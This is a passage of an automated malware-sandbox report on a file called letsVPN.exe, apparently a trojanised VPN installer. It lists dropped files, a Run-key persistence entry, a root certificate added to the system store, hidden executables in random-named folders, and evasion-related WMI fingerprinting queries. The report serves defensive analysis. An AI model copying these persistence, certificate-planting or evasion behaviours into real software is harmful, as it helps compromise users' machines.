              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\SETC543.tmp
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\uninst.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dll
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File created: C:\Users\user\Videos\24D30D1C~16\Gztcrf.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dll
              Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\base.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\s
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exe
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\msvcr120.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\msvcp120.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\letsvpn-latest.exe
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\tap0901.sys (copy)
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmp
              Source: C:\Windows\System32\drvinst.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
              Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 15628 -> 49725
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D70 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0000000180010D70
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
              Source: C:\Users\user\Desktop\letsVPN.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mmc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer <> 'Microsoft'))
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = 'tap0901'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{C8FEB3F8-0D5E-4B0F-9BED-F9873F0BFFFC}"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
